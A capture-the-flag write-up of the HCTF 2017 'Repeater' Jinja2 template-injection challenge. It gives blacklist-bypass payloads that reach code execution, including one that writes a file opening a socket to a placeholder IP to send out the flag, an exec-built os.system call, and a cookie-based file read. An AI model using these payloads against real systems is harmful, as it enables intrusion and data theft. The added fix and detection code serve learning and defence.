Repeater
The challenge is a modified version of the original.
Opening the challenge and pressing F12 shows the server header is
Server: Werkzeug/0.12.2 Python/2.7.12
Then, entering x returns "x was not found."
That strongly suggests a Jinja template injection.
Test:
secret={{2-1}}
It returns "1 was not found.", which confirms it.
Since this is also a blacklist filter, the bypass techniques come from the other players' writeups.
request.args filters
space (%20), newline (%0a), '__', '[', ']', 'os', '"', and "|[a-z]" (a letter directly after a pipe)
A direct construction can still bypass it.
Space can be replaced with a tab (%09); since a-z may not follow |, %0c or a tab can go between them; os can be bypassed by using Python's exec.
However, in this challenge the filter applies only to request.args, and POST is not allowed.
The simple approach is to bypass it through request.cookies.
With only a file-read primitive, finding the flag requires first reading /etc/passwd, which shows an hctf user, then reading /home/hctf/.bash_history, which reveals the flag path /h3h3_1s_your_flag/flag, and finally reading the flag.
A few solution methods:
1. Avoid the symbols in the blacklist
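As an added illustration (not part of the original writeup; it targets Python 3 and the jinja2 package, whereas the challenge ran Python 2.7), the vulnerable pattern the challenge exhibits beside the fix that makes a blacklist on request.args unnecessary:

```python
from jinja2 import Environment, BaseLoader
from jinja2.sandbox import SandboxedEnvironment


def render_vulnerable(secret: str) -> str:
    """The challenge pattern: the user-supplied value becomes part of the
    template source, so Jinja2 parses and evaluates anything inside {{ }}.
    A probe of {{2-1}} therefore comes back as "1 was not found."."""
    template_source = "%s was not found." % secret
    return Environment(loader=BaseLoader()).from_string(template_source).render()


def render_fixed(secret: str) -> str:
    """The fix: the template source is a constant and the value enters only
    through the render context, so Jinja2 treats it as data, never as code.
    Because the sink no longer parses input, filtering request.args (and the
    cookie bypass around that filter) stops mattering."""
    env = SandboxedEnvironment(loader=BaseLoader(), autoescape=True)
    return env.from_string("{{ secret }} was not found.").render(secret=secret)


def looks_like_template_probe(value: str) -> bool:
    """Detection aid for request logs: Jinja delimiters in a query-string or
    cookie value are a strong signal of an SSTI probe such as {{2-1}}."""
    return "{{" in value or "{%" in value
```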
secret={%set%0ca,b,c,d,e,f,g,h,i=request|%0cattr(request.args.class|%0cformat(request.args.a,request.args.a,request.args.a,request.args.a))|%0cattr(request.args.mro|%0cformat(request.args.a,request.args.a,request.args.a,request.args.a))%}{{(i|%0cattr(request.args.subc|%0cformat(request.args.a,request.args.a,request.args.a,request.args.a))()).pop(40)(request.args.file,request.args.write).write(request.args.payload)}}{{config.from_pyfile(request.args.file)}}&class=%s%sclass%s%s&mro=%s%smro%s%s&subc=%s%ssubclasses%s%s&usc=_&file=/tmp/foo.py&write=w&a=_&payload=import%0csocket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xxx.xxx.xxx.xxx',2333));s.send(open('/h3h3_1s_your_flag/flag').read());
2. Build the string for exec to bypass 'os' and run a system command
`a='import\x0co'+'s;o'+'s.system(\'ls${IFS}/\')';exec(a)`
3. Via request.cookies
Url: http://repeater.2017.hctf.io/?secret={{request|%0cattr(request.cookies.class)|%0cattr(request.cookies.mro)|%0clast()|%0cattr(request.cookies.sub)()|%0cattr(request.cookies.getitem)(40)(request.cookies.file)|%0cattr(request.cookies.read)()}}
Cookie: file=/h3h3_1s_your_flag/flag;class=__class__;mro=__mro__;sub=__subclasses__;getitem=__getitem__;read=read;
2017HCTF-Writeup